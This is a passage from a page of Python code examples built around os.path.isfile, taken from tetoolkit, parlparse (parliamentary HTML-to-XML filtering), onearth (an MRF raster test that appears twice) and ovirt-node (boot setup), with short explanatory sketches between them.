    if args.cinputs is not None:
        cinput = args.cinputs[0]
        
    args.argtxt = "\n".join((
        "# ARGUMENTS LIST:",\
        "# name = %s" % (args.prj_name),\
        "# treatment files = %s" % (args.tfiles),\
        "# control files = %s" % (args.cfiles),\
        '# treatment input = %s' % (args.tinputs[0]),\
        '# control input = %s' % (cinput),\
 #       "# window size = %d" % (args.wsize),\
        "# step = %d" % (args.step),\
 #       "# gap = %d" % (args.gap),\
        "# fragment size = %d" % (args.fragsize),\
        "# species = %s (hg:human, rn:rat, mm:mouse)" % (args.species[0]),\
        "# min read cutoff = %d" % (args.minread),\
        "# statistical model = Poisson distribution" ,\
        "# normalization = %s (sd: sequence depth, bc: bin correlation)" % (args.norm),\
        "# pvalue cutoff = %.2e" % (args.pval),\
        "# TEmode = %s " % (args.TEmode)
     #   "# TE annotation file = %s \n" % (args.TEannotation)
        ))
    
    return args  
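
read_opts validates every input path with os.path.isfile before any work is done, logging and exiting on the first missing file. A minimal sketch of that validation loop, with require_files as an illustrative name rather than anything in tetoolkit:

import logging
import os
import sys

def require_files(paths):
    """Exit with an error on the first path that is not an existing file."""
    for path in paths:
        if not os.path.isfile(path):
            logging.error("No such file: %s !\n" % path)
            sys.exit(1)

# e.g. require_files(args.tfiles) before touching any alignments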

Example 27

Project: parlparse
Source File: runfilters.py
View license
def RunFilterFile(FILTERfunction, xprev, sdate, sdatever, dname, jfin, patchfile, jfout, bquietc):
    # now apply patches and parse
    patchtempfilename = tempfile.mktemp("", "pw-applypatchtemp-", miscfuncs.tmppath)

    if not bquietc:
        print "reading " + jfin

    # apply patch filter
    kfin = jfin
    if os.path.isfile(patchfile) and ApplyPatches(jfin, patchtempfilename, patchfile):
        kfin = patchtempfilename

    # read the text of the file
    ofin = open(kfin)
    text = ofin.read()
    ofin.close()

    # do the filtering according to the type.  Some stuff is being inlined here
    if dname == 'regmem' or dname == 'votes' or dname == 'ni':
        regmemout = open(tempfilename, 'w')
        try:
            FILTERfunction(regmemout, text, sdate, sdatever)  # totally different filter function format
        finally:
            regmemout.close()
        # in win32 this function leaves the file open and stops it being renamed
        if sys.platform != "win32":
            xmlvalidate.parse(tempfilename) # validate XML before renaming
        if os.path.isfile(jfout):
            os.remove(jfout)
        os.rename(tempfilename, jfout)
        return

    safejfout = jfout
    assert dname in ('wrans', 'debates', 'wms', 'westminhall', 'lordspages')

    decode_from_utf8 = False
    if sdate > '2014-01-01' or (sdate > '2006-05-07' and re.search('<notus-date', text)):
        decode_from_utf8 = True
        text = re.sub("\n", ' ', text)
        text = re.sub("\s{2,}", ' ', text) # No need for multiple spaces anywhere
        text = re.sub("</?notus-date[^>]*>", "", text)
        text = re.sub("\s*<meta[^>]*>\s*", "", text)
        text = re.sub('(<h5 align="left">)((?:<a name="(.*?)">)*)', r"\2\1", text) # If you can't beat them, ...
        text = re.sub("(<br><b>[^:<]*:\s*column\s*\d+(?:WH)?\s*</b>)(\s+)(?i)", r"\1<br>\2", text)
        text = re.sub("(\s+)(<b>[^:<]*:\s*column\s*\d+(?:WH)?\s*</b><br>)(?i)", r"\1<br>\2", text)

        # Make sure correction is before written answer question number
        text = re.sub('(<a href="[^"]*corrtext[^"]*")\s*shape="rect">\s*(.*?)\s*(</a>)', r'\1>\2\3', text)
        text = re.sub('(\[\d+\])\s*((?:</p>)?)\s*(<a href="[^"]*corrtext[^"]*">.*?</a>)', r'\3 \1\2', text)

        # Fix new thing where they sometimes put (a), (b) of wrans, or "Official Report", in separate paragraphs
        # Two regular expressions, so as not to lose needed end </p> of a column heading.
        italic_para = '\s*<p>\s*(<i>\s*(?:\(.\)|Official Report,?)\s*</i>)\s*</p>\s*'
        text = re.sub('(?<!</b>)</p>' + italic_para + '<p[^>]*>', r' \1 ', text)
        text = re.sub('(?<=</b></p>)' + italic_para + '<p[^>]*>', r' \1 ', text)

        # May also need the same thing with a space, and look behind requires a fixed width pattern.
        text = re.sub('(?<!</b>) </p>' + italic_para + '<p[^>]*>', r' \1 ', text)
        text = re.sub('(?<=</b> </p>)' + italic_para + '<p[^>]*>', r' \1 ', text)
                
        # Don't want bad XHTML self closed table cells.
        text = re.sub('<td([^>]*) ?/>', r'<td\1></td>', text)
        # Or pointless empty headings
        text = re.sub('<h[45] align="[^"]*" ?/>', '', text)

        # Lords, big overall replacements
        text = text.replace('<br></br>', '<br>')
        text = text.replace('<br/>', '<br>')
        if dname == 'lordspages':
            text = re.sub(' shape="rect">', '>', text)
            text = re.sub(' class="anchor"', '', text)
            text = re.sub(' class="anchor noCont"', '', text)
            text = re.sub(' class="anchor-column"', '', text)
            text = re.sub(' class="columnNum"', '', text)
            text = re.sub('(<a[^>]*>) (</a>)', r'\1\2', text)
            text = re.sub('(<h5>)((?:<a name="(.*?)">(?:</a>)?)*)', r"\2\1", text) # If you can't beat them, ...
            text = re.sub('<columnNum><br />( |\xc2\xa0)<br />', '<br>&nbsp;<br>', text)
            text = re.sub('<br />( |\xc2\xa0)<br /></columnNum>', '<br>&nbsp;<br>', text)
            text = text.replace('<b align="center">', '<b>')
            text = text.replace('<br />', '<br>')
            text = text.replace('CONTENTS', 'CONTENTS\n')
            text = re.sub('</?small>', '', text)
            text = re.sub('<div class="amendment(?:_heading)?">', '', text)
            text = re.sub('</?div>', '', text)
            # Double bolding sometimes has some <a> tags in between
            text = re.sub(r'<b>((?:</?a[^>]*>|\s)*)<b>', r'\1<b>', text)
            text = re.sub('</b></b>', '</b>', text)
            text = re.sub('</b><b>', '', text)
            text = re.sub('<I></I>', '', text)

    # Changes in 2008-09 session
    if sdate>'2008-12-01' and dname=='lordspages':
        text = re.sub('(?i)Asked By (<b>.*?)</b>', r'\1:</b>', text)
        text = re.sub('(?i)((?:Moved|Tabled) By) ?((?:<a name="[^"]*"></a>)*)<b>(.*?)</b>', r'\1 \2\3', text)
        text = re.sub('(?i)(Moved on .*? by) ?<b>(.*?)</b>', r'\1 \2', text)

    if decode_from_utf8:
        # Some UTF-8 gets post-processed into nonsense
        # XXX - should probably be in miscfuncs.py/StraightenHTMLrecurse with other character set evil
        text = text.replace("\xe2\x22\xa2", "&trade;")
        text = text.replace("\xc2(c)", "&copy;")
        text = text.replace("\xc2(r)", "&reg;")
        text = text.replace("\xc21/4", "&frac14;")
        text = text.replace("\xc21/2", "&frac12;")
        text = text.replace("\xc23/4", "&frac34;")
        text = text.replace("\xc3\"", "&#279;")
        text = text.replace("\xc3 ", "&agrave;")
        text = text.replace("\xc3(c)", "&eacute;")
        text = text.replace("\xc3(r)", "&icirc;")
        text = text.replace("\xc31/4", "&uuml;")
        # And it's true UTF-8 since the start of the 2009 session, let's pretend it isn't.
        try:
            text = text.decode('utf-8').encode('ascii', 'xmlcharrefreplace')
        except:
            print "Failed to decode text from utf-8"
            pass

    # They've started double bolding names, parts of names, splitting names up, and having a "[" on its own
    if sdate >= '2013-01-01':
        text = re.sub(r'</b>(\s*)<b>', r'\1', text)
        # <b> <b>Name</b> (Constituency) (Party):</b>
        text = re.sub('<b>\s*<b>([^<]*)</b>([^<]*)</b>', r'<b>\1\2</b>', text)
        # <b><b>Name bits:</b></b>
        text = re.sub('<b>\s*(<b>([^<]|<i>\s*\(Urgent Question\)\s*</i>)*</b>\s*)</b>', r'\1', text)
        # <p> <b>[</b> </p> <p> <b>TIME</b> </p>
        text = re.sub('<p>\s*<b>\[</b>\s*</p>\s*<p>\s*<b>([^<]*)</b>\s*</p>', r'<p> <b>[\1</b> </p>', text)
        # And have changed <center> to <span class="centred">
        text = re.sub('<span class="centred">(.*?)</span>', r'<center>\1</center>', text)

    if sdate >= '2015-10-12':
        # annoying double <b> round members rose text
        text = re.sub(r'<b><b>Several hon. Members </b>', '<b>Several hon. Members ', text)

    if sdate >= '2016-01-01':
        # Deal with big heading spotting aname appearing AFTER heading
        text = re.sub('(<h3(?:(?!<h3).)*?)(<a name="ordayhd_\d">)', r'\2\1', text)

    (flatb, gidname) = FILTERfunction(text, sdate)
    for i in range(len(gidname)):
        tempfilenameoldxml = None

        gidnam = gidname[i]
        if gidname[i] == 'lordswms':
            gidnam = 'wms'
        if gidname[i] == 'lordswrans':
            gidnam = 'wrans'
        CreateGIDs(gidnam, sdate, sdatever, flatb[i])
        jfout = safejfout
        if gidname[i] != 'lords':
            jfout = re.sub('(daylord|lordspages)', gidname[i], jfout)

        # wrans case is special, with its question-id numbered gids
        if dname == 'wrans':
            majblocks = CreateWransGIDs(flatb[i], (sdate + sdatever)) # combine the date and datever.  the old style gids stand on the paragraphs still
            bMakeOldWransGidsToNew = (sdate < "2005")

        fout = open(tempfilename, "w")
        WriteXMLHeader(fout)
        fout.write('<publicwhip scrapeversion="%s" latest="yes">\n' % sdatever)

        # go through and output all the records into the file
        if dname == 'wrans':
            for majblock in majblocks:
                WriteXMLspeechrecord(fout, majblock[0], bMakeOldWransGidsToNew, True)
                for qblock in majblock[1]:
                    qblock.WriteXMLrecords(fout, bMakeOldWransGidsToNew)
        else:
            for qb in flatb[i]:
                WriteXMLspeechrecord(fout, qb, False, False)
        fout.write("</publicwhip>\n\n")
        fout.close()

        # load in a previous file and over-write it if necessary
        if xprev:
            xprevin = xprev[0]
            if gidname[i] != 'lords':
                xprevin = re.sub('(daylord|lordspages)', gidname[i], xprevin)
            if os.path.isfile(xprevin):
                xin = open(xprevin, "r")
                xprevs = xin.read()
                xin.close()

                # separate out the scrape versions
                mpw = re.search('<publicwhip([^>]*)>\n([\s\S]*?)</publicwhip>', xprevs)
                if mpw.group(1):
                    assert re.match(' scrapeversion="([^"]*)" latest="yes"', mpw.group(1)).group(1) == xprev[1]
                # else it's old style xml files that had no scrapeversion or latest attributes
                if dname == 'wrans':
                    xprevcompress = FactorChangesWrans(majblocks, mpw.group(2))
                else:
                    xprevcompress = FactorChanges(flatb[i], mpw.group(2))

                tempfilenameoldxml = tempfile.mktemp(".xml", "pw-filtertempold-", miscfuncs.tmppath)
                foout = open(tempfilenameoldxml, "w")
                WriteXMLHeader(foout)
                foout.write('<publicwhip scrapeversion="%s" latest="no">\n' % xprev[1])
                foout.writelines(xprevcompress)
                foout.write("</publicwhip>\n\n")
                foout.close()

        # in win32 this function leaves the file open and stops it being renamed
        if sys.platform != "win32":
            xmlvalidate.parse(tempfilename) # validate XML before renaming

        # in case of error, an exception is thrown, so this line would not be reached
        # we rename both files (the old and new xml) at once

        if os.path.isfile(jfout):
            os.remove(jfout)
        if not os.path.isdir(os.path.dirname(jfout)):  # Lords output directories need making here
            os.mkdir(os.path.dirname(jfout))
        os.rename(tempfilename, jfout)

        # copy over onto old xml file
        if tempfilenameoldxml:
            if sys.platform != "win32":
                xmlvalidate.parse(tempfilenameoldxml) # validate XML before renaming
            assert os.path.isfile(xprevin)
            os.remove(xprevin)
            os.rename(tempfilenameoldxml, xprevin)
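
Both output paths here follow the same replace-in-place idiom: write to a temp file, validate it, delete any previous output that os.path.isfile finds, then os.rename the temp file over it (os.rename raises on Windows if the target already exists, hence the explicit remove). A minimal sketch under those assumptions; replace_file is an illustrative name, not part of parlparse:

import os

def replace_file(tmp_path, final_path):
    """Move tmp_path over final_path, clearing any previous output."""
    out_dir = os.path.dirname(final_path)
    if out_dir and not os.path.isdir(out_dir):
        os.mkdir(out_dir)  # output directories may need making here
    if os.path.isfile(final_path):
        os.remove(final_path)  # os.rename cannot overwrite on win32
    os.rename(tmp_path, final_path)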

Example 28

Project: onearth
Source File: test_mrfgen.py
View license
    def test_generate_mrf_obpg(self):
        '''
        This portion covers the following test cases:
            Test using empty MRF with No Copy option
        '''
        # Check MRF generation succeeded
        self.assertTrue(os.path.isfile(self.output_mrf), "MRF generation failed")
        
        # Read MRF
        dataset = gdal.Open(self.output_mrf)
        driver = dataset.GetDriver()
        if DEBUG:
            print 'Driver:', str(driver.LongName)
        self.assertEqual(str(driver.LongName), "Meta Raster Format", "Driver is not Meta Raster Format")

        # This part of the test previously looked for a triplet of files in dataset.GetFileList().         
        if DEBUG:
            print 'Files: {0}, {1}'.format(self.output_ppg, self.output_idx)
        self.assertTrue(os.path.isfile(self.output_ppg), "MRF PPG generation failed")
        self.assertTrue(os.path.isfile(self.output_idx), "MRF IDX generation failed")
        self.assertTrue(os.path.isfile(self.output_zdb), "MRF ZDB generation failed")
        
        if DEBUG:
            print 'Projection:', str(dataset.GetProjection())
        self.assertEqual(str(dataset.GetProjection()),'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]')
        
        if DEBUG:
            print 'Size: ',dataset.RasterXSize,'x',dataset.RasterYSize, 'x',dataset.RasterCount
        self.assertEqual(dataset.RasterXSize, 40960, "Size does not match")
        self.assertEqual(dataset.RasterYSize, 20480, "Size does not match")
        self.assertEqual(dataset.RasterCount, 1, "Number of bands do not match")
        
        geotransform = dataset.GetGeoTransform()
        if DEBUG:
            print 'Origin: (',geotransform[0], ',',geotransform[3],')'
        self.assertEqual(geotransform[0], -180.0, "Origin does not match")
        self.assertEqual(geotransform[3], 90.0, "Origin does not match")
        if DEBUG:
            print 'Pixel Size: (',geotransform[1], ',',geotransform[5],')'
        self.assertEqual(float(geotransform[1]), 0.0087890625, "Pixel size does not match")
        self.assertEqual(float(geotransform[5]), -0.0087890625, "Pixel size does not match")
        
        band = dataset.GetRasterBand(1)
        if DEBUG:
            print 'Overviews:', band.GetOverviewCount()
        self.assertEqual(band.GetOverviewCount(), 7, "Overview count does not match")
        
        # Convert and compare MRF
        mrf = gdal.Open(self.output_mrf)
        driver = gdal.GetDriverByName("PNG")       
        img = driver.CreateCopy(self.output_img_a, mrf, 0 )
        
        if DEBUG:
            print 'Generated: ' + ' '.join(img.GetFileList())
            print 'Size: ',img.RasterXSize,'x',img.RasterYSize, 'x',img.RasterCount
        self.assertEqual(img.RasterXSize, dataset.RasterXSize, "Size does not match")
        self.assertEqual(img.RasterYSize, dataset.RasterYSize, "Size does not match")
        self.assertEqual(img.RasterCount, dataset.RasterCount, "Size does not match")
        
        '''
        This portion covers the following test cases:
            Test composite MRF with No Copy option
            Test using granule images
            Test using existing MRF
            Test using granule images with Z-level
            Test input images that cross antimeridian
            Test merging of input images with transparency
            Test adding image to existing Z-level
        '''
        
        # Read MRF
        dataset = gdal.Open(self.output_mrf+":MRF:Z0")
        driver = dataset.GetDriver()
        if DEBUG:
            print 'Driver:', str(driver.LongName)
        self.assertEqual(str(driver.LongName), "Meta Raster Format", "Driver is not Meta Raster Format")
        
        if DEBUG:
            print 'Projection:', str(dataset.GetProjection())
        self.assertEqual(str(dataset.GetProjection()),'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]')
        
        if DEBUG:
            print 'Size: ',dataset.RasterXSize,'x',dataset.RasterYSize, 'x',dataset.RasterCount
        self.assertEqual(dataset.RasterXSize, 40960, "Size does not match")
        self.assertEqual(dataset.RasterYSize, 20480, "Size does not match")
        self.assertEqual(dataset.RasterCount, 1, "Number of bands do not match")
        
        geotransform = dataset.GetGeoTransform()
        if DEBUG:
            print 'Origin: (',geotransform[0], ',',geotransform[3],')'
        self.assertEqual(geotransform[0], -180.0, "Origin does not match")
        self.assertEqual(geotransform[3], 90.0, "Origin does not match")
        if DEBUG:
            print 'Pixel Size: (',geotransform[1], ',',geotransform[5],')'
        self.assertEqual(float(geotransform[1]), 0.0087890625, "Pixel size does not match")
        self.assertEqual(float(geotransform[5]), -0.0087890625, "Pixel size does not match")
        
        band = dataset.GetRasterBand(1)
        if DEBUG:
            print 'Overviews:', band.GetOverviewCount()
        self.assertEqual(band.GetOverviewCount(), 7, "Overview count does not match")
        
        # Compare MRF
        img = gdal.Open(self.output_img_b)
        if DEBUG:
            print 'Size: ',img.RasterXSize,'x',img.RasterYSize, 'x',img.RasterCount        
            print "Comparing: " + self.output_img_b + " to " + self.compare_img_b
        self.assertTrue(filecmp.cmp(self.output_img_b, self.compare_img_b), "Output composite image does not match")

        '''
        This portion covers the following test cases:        
            Test adding image to new Z-level
            Test adding image to multiple Z-levels
            Test using single image with Z-level
        '''
        # Read MRF
        dataset = gdal.Open(self.output_mrf+":MRF:Z1")
        driver = dataset.GetDriver()
        if DEBUG:
            print 'Driver:', str(driver.LongName)
        self.assertEqual(str(driver.LongName), "Meta Raster Format", "Driver is not Meta Raster Format")
        
        if DEBUG:
            print 'Projection:', str(dataset.GetProjection())
        self.assertEqual(str(dataset.GetProjection()),'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]')
        
        if DEBUG:
            print 'Size: ',dataset.RasterXSize,'x',dataset.RasterYSize, 'x',dataset.RasterCount
        self.assertEqual(dataset.RasterXSize, 40960, "Size does not match")
        self.assertEqual(dataset.RasterYSize, 20480, "Size does not match")
        self.assertEqual(dataset.RasterCount, 1, "Number of bands do not match")
        
        geotransform = dataset.GetGeoTransform()
        if DEBUG:
            print 'Origin: (',geotransform[0], ',',geotransform[3],')'
        self.assertEqual(geotransform[0], -180.0, "Origin does not match")
        self.assertEqual(geotransform[3], 90.0, "Origin does not match")
        if DEBUG:
            print 'Pixel Size: (',geotransform[1], ',',geotransform[5],')'
        self.assertEqual(float(geotransform[1]), 0.0087890625, "Pixel size does not match")
        self.assertEqual(float(geotransform[5]), -0.0087890625, "Pixel size does not match")
        
        band = dataset.GetRasterBand(1)
        if DEBUG:
            print 'Overviews:', band.GetOverviewCount()
        self.assertEqual(band.GetOverviewCount(), 7, "Overview count does not match")
        
        # Compare MRF
        img = gdal.Open(self.output_img_c)
        if DEBUG:
            print 'Size: ',img.RasterXSize,'x',img.RasterYSize, 'x',img.RasterCount        
            print "Comparing: " + self.output_img_c + " to " + self.compare_img_c
        self.assertTrue(filecmp.cmp(self.output_img_c, self.compare_img_c), "Output granule image does not match")
        
        img = None
        
        # Test ZDB
        if DEBUG:
            print "Checking " + self.output_zdb
        con = sqlite3.connect(self.output_zdb)
        cur = con.cursor()
        # Check for existing key
        cur.execute("SELECT COUNT(*) FROM ZINDEX;")
        lid = int(cur.fetchone()[0])
        if DEBUG:
            print "Number of records: " + str(lid)
        self.assertEqual(lid, 2, "Number of records not matching in ZDB")
        # Check for matching keys
        cur.execute("SELECT key_str FROM ZINDEX where z=0;")
        key_str = cur.fetchone()[0]
        if DEBUG:
            print key_str
        self.assertEqual(key_str, '20151202', "Time for Z=0 does not match in ZDB")
        cur.execute("SELECT key_str FROM ZINDEX where z=1;")
        key_str = cur.fetchone()[0]
        if DEBUG:
            print key_str
        self.assertEqual(key_str, '20151202000000', "Time for Z=1 does not match in ZDB")
        if con:
            con.close()
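
The test leans on os.path.isfile through assertTrue to confirm that every generated artifact (MRF, PPG, IDX, ZDB) exists before opening it with GDAL or sqlite3. A minimal sketch of that pattern, with OutputFilesTest and assert_outputs_exist as illustrative names only:

import os
import unittest

class OutputFilesTest(unittest.TestCase):
    def assert_outputs_exist(self, *paths):
        # Fail fast, with the offending path in the message, before
        # any attempt to open the files with heavier libraries.
        for path in paths:
            self.assertTrue(os.path.isfile(path),
                            "%s was not generated" % path)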

Example 32

Project: onearth
Source File: test_mrfgen.py
View license
    def test_generate_mrf_obpg(self):
        '''
        This portion the following test cases:
            Test using empty MRF with No Copy option
        '''
        # Check MRF generation succeeded
        self.assertTrue(os.path.isfile(self.output_mrf), "MRF generation failed")
        
        # Read MRF
        dataset = gdal.Open(self.output_mrf)
        driver = dataset.GetDriver()
        if DEBUG:
            print 'Driver:', str(driver.LongName)
        self.assertEqual(str(driver.LongName), "Meta Raster Format", "Driver is not Meta Raster Format")

        # This part of the test previously looked for a triplet of files in dataset.GetFileList().         
        if DEBUG:
            print 'Files: {0}, {1}'.format(self.output_ppg, self.output_idx)
        self.assertTrue(os.path.isfile(self.output_ppg), "MRF PPG generation failed")
        self.assertTrue(os.path.isfile(self.output_idx), "MRF IDX generation failed")
        self.assertTrue(os.path.isfile(self.output_zdb), "MRF ZDB generation failed")
        
        if DEBUG:
            print 'Projection:', str(dataset.GetProjection())
        self.assertEqual(str(dataset.GetProjection()),'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]')
        
        if DEBUG:
            print 'Size: ',dataset.RasterXSize,'x',dataset.RasterYSize, 'x',dataset.RasterCount
        self.assertEqual(dataset.RasterXSize, 40960, "Size does not match")
        self.assertEqual(dataset.RasterYSize, 20480, "Size does not match")
        self.assertEqual(dataset.RasterCount, 1, "Number of bands do not match")
        
        geotransform = dataset.GetGeoTransform()
        if DEBUG:
            print 'Origin: (',geotransform[0], ',',geotransform[3],')'
        self.assertEqual(geotransform[0], -180.0, "Origin does not match")
        self.assertEqual(geotransform[3], 90.0, "Origin does not match")
        if DEBUG:
            print 'Pixel Size: (',geotransform[1], ',',geotransform[5],')'
        self.assertEqual(float(geotransform[1]), 0.0087890625, "Pixel size does not match")
        self.assertEqual(float(geotransform[5]), -0.0087890625, "Pixel size does not match")
        
        band = dataset.GetRasterBand(1)
        if DEBUG:
            print 'Overviews:', band.GetOverviewCount()
        self.assertEqual(band.GetOverviewCount(), 7, "Overview count does not match")
        
        # Convert and compare MRF
        mrf = gdal.Open(self.output_mrf)
        driver = gdal.GetDriverByName("PNG")       
        img = driver.CreateCopy(self.output_img_a, mrf, 0 )
        
        if DEBUG:
            print 'Generated: ' + ' '.join(img.GetFileList())
            print 'Size: ',img.RasterXSize,'x',img.RasterYSize, 'x',img.RasterCount
        self.assertEqual(img.RasterXSize, dataset.RasterXSize, "Size does not match")
        self.assertEqual(img.RasterYSize, dataset.RasterYSize, "Size does not match")
        self.assertEqual(img.RasterCount, dataset.RasterCount, "Size does not match")
        
        '''
        This portion covers the following test cases:
            Test composite MRF with No Copy option
            Test using granule images
            Test using existing MRF
            Test using granule images with Z-level
            Test input images that cross antimeridian
            Test merging of input images with transparency
            Test adding image to existing Z-level
        '''
        
        # Read MRF
        dataset = gdal.Open(self.output_mrf+":MRF:Z0")
        driver = dataset.GetDriver()
        if DEBUG:
            print 'Driver:', str(driver.LongName)
        self.assertEqual(str(driver.LongName), "Meta Raster Format", "Driver is not Meta Raster Format")
        
        if DEBUG:
            print 'Projection:', str(dataset.GetProjection())
        self.assertEqual(str(dataset.GetProjection()),'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]')
        
        if DEBUG:
            print 'Size: ',dataset.RasterXSize,'x',dataset.RasterYSize, 'x',dataset.RasterCount
        self.assertEqual(dataset.RasterXSize, 40960, "Size does not match")
        self.assertEqual(dataset.RasterYSize, 20480, "Size does not match")
        self.assertEqual(dataset.RasterCount, 1, "Number of bands do not match")
        
        geotransform = dataset.GetGeoTransform()
        if DEBUG:
            print 'Origin: (',geotransform[0], ',',geotransform[3],')'
        self.assertEqual(geotransform[0], -180.0, "Origin does not match")
        self.assertEqual(geotransform[3], 90.0, "Origin does not match")
        if DEBUG:
            print 'Pixel Size: (',geotransform[1], ',',geotransform[5],')'
        self.assertEqual(float(geotransform[1]), 0.0087890625, "Pixel size does not match")
        self.assertEqual(float(geotransform[5]), -0.0087890625, "Pixel size does not match")
        
        band = dataset.GetRasterBand(1)
        if DEBUG:
            print 'Overviews:', band.GetOverviewCount()
        self.assertEqual(band.GetOverviewCount(), 7, "Overview count does not match")
        
        # Compare MRF
        img = gdal.Open(self.output_img_b)
        if DEBUG:
            print 'Size: ',img.RasterXSize,'x',img.RasterYSize, 'x',img.RasterCount        
            print "Comparing: " + self.output_img_b + " to " + self.compare_img_b
        self.assertTrue(filecmp.cmp(self.output_img_b, self.compare_img_b), "Output composite image does not match")

        '''
        This portion covers the following test cases:        
            Test adding image to new Z-level
            Test adding image to multiple Z-levels
            Test using single image with Z-level
        '''
        # Read MRF
        dataset = gdal.Open(self.output_mrf+":MRF:Z1")
        driver = dataset.GetDriver()
        if DEBUG:
            print 'Driver:', str(driver.LongName)
        self.assertEqual(str(driver.LongName), "Meta Raster Format", "Driver is not Meta Raster Format")
        
        if DEBUG:
            print 'Projection:', str(dataset.GetProjection())
        self.assertEqual(str(dataset.GetProjection()),'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]')
        
        if DEBUG:
            print 'Size: ',dataset.RasterXSize,'x',dataset.RasterYSize, 'x',dataset.RasterCount
        self.assertEqual(dataset.RasterXSize, 40960, "Size does not match")
        self.assertEqual(dataset.RasterYSize, 20480, "Size does not match")
        self.assertEqual(dataset.RasterCount, 1, "Number of bands do not match")
        
        geotransform = dataset.GetGeoTransform()
        if DEBUG:
            print 'Origin: (',geotransform[0], ',',geotransform[3],')'
        self.assertEqual(geotransform[0], -180.0, "Origin does not match")
        self.assertEqual(geotransform[3], 90.0, "Origin does not match")
        if DEBUG:
            print 'Pixel Size: (',geotransform[1], ',',geotransform[5],')'
        self.assertEqual(float(geotransform[1]), 0.0087890625, "Pixel size does not match")
        self.assertEqual(float(geotransform[5]), -0.0087890625, "Pixel size does not match")
        
        band = dataset.GetRasterBand(1)
        if DEBUG:
            print 'Overviews:', band.GetOverviewCount()
        self.assertEqual(band.GetOverviewCount(), 7, "Overview count does not match")
        
        # Convert and compare MRF
        img = gdal.Open(self.output_img_c)
        if DEBUG:
            print 'Size: ',img.RasterXSize,'x',img.RasterYSize, 'x',img.RasterCount        
            print "Comparing: " + self.output_img_c + " to " + self.compare_img_c
        self.assertTrue(filecmp.cmp(self.output_img_c, self.compare_img_c), "Output granule image does not match")
        
        img = None
        
        # Test ZDB
        if DEBUG:
            print "Checking " + self.output_zdb
        con = sqlite3.connect(self.output_zdb)
        cur = con.cursor()
        # Check for existing key
        cur.execute("SELECT COUNT(*) FROM ZINDEX;")
        lid = int(cur.fetchone()[0])
        if DEBUG:
            print "Number of records: " + str(lid)
        self.assertEqual(lid, 2, "Number of records not matching in ZDB")
        # Check for matching keys
        cur.execute("SELECT key_str FROM ZINDEX where z=0;")
        key_str = cur.fetchone()[0]
        if DEBUG:
            print key_str
        self.assertEqual(key_str, '20151202', "Time for Z=0 does not match in ZDB")
        cur.execute("SELECT key_str FROM ZINDEX where z=1;")
        key_str = cur.fetchone()[0]
        if DEBUG:
            print key_str
        self.assertEqual(key_str, '20151202000000', "Time for Z=1 does not match in ZDB")
        if con:
            con.close()
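
The ZDB check above opens the SQLite file directly; a guard with os.path.isfile is useful here because sqlite3.connect() silently creates an empty database when the path does not exist, turning a missing file into a confusing "no such table" error later. A minimal sketch of that guard (the helper name is illustrative, not part of the test suite):

import os
import sqlite3

def read_z_index(zdb_path):
    # Refuse to open a ZDB that is not an existing regular file;
    # sqlite3.connect() would otherwise create an empty database.
    if not os.path.isfile(zdb_path):
        raise IOError("ZDB not found: %s" % zdb_path)
    con = sqlite3.connect(zdb_path)
    try:
        cur = con.cursor()
        cur.execute("SELECT z, key_str FROM ZINDEX ORDER BY z;")
        return cur.fetchall()
    finally:
        con.close()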

Example 33

Project: ovirt-node
Source File: install.py
View license
    def ovirt_boot_setup(self, reboot="N"):
        self.generate_paths()
        logger.info("Installing the image.")
        # copy grub.efi to safe location
        if _functions.is_efi_boot():
            if "OVIRT_ISCSI_INSTALL" in OVIRT_VARS:
                _functions.system("umount /boot")
            if os.path.isfile("/boot/efi/%s/grubx64.efi" % self.efi_path):
                shutil.copy("/boot/efi/%s/grubx64.efi" % self.efi_path, "/tmp")
            else:
                shutil.copy("/boot/efi/%s/grub.efi" % self.efi_path, "/tmp")
            _functions.mount_boot()
        if "OVIRT_ROOT_INSTALL" in OVIRT_VARS:
            if OVIRT_VARS["OVIRT_ROOT_INSTALL"] == "n":
                logger.info("Root Installation Not Required, Finished.")
                return True
        self.oldtitle=None
        grub_config_file = None
        if _functions.findfs("Boot") and _functions.is_upgrade():
            grub_config_file = "/boot/grub/grub.conf"
            if not _functions.connect_iscsi_root():
                return False
        _functions.mount_liveos()
        if os.path.ismount("/liveos"):
            if os.path.exists("/liveos/vmlinuz0") \
                              and os.path.exists("/liveos/initrd0.img"):
                grub_config_file = self.grub_config_file
        elif not _functions.is_firstboot():
            # find existing iscsi install
            if _functions.findfs("Boot"):
                grub_config_file = "/boot/grub/grub.conf"
            elif os.path.ismount("/dev/.initramfs/live"):
                if not _functions.grub2_available():
                    grub_config_file = "/dev/.initramfs/live/grub/grub.conf"
                else:
                    grub_config_file = "/dev/.initramfs/live/grub2/grub.cfg"
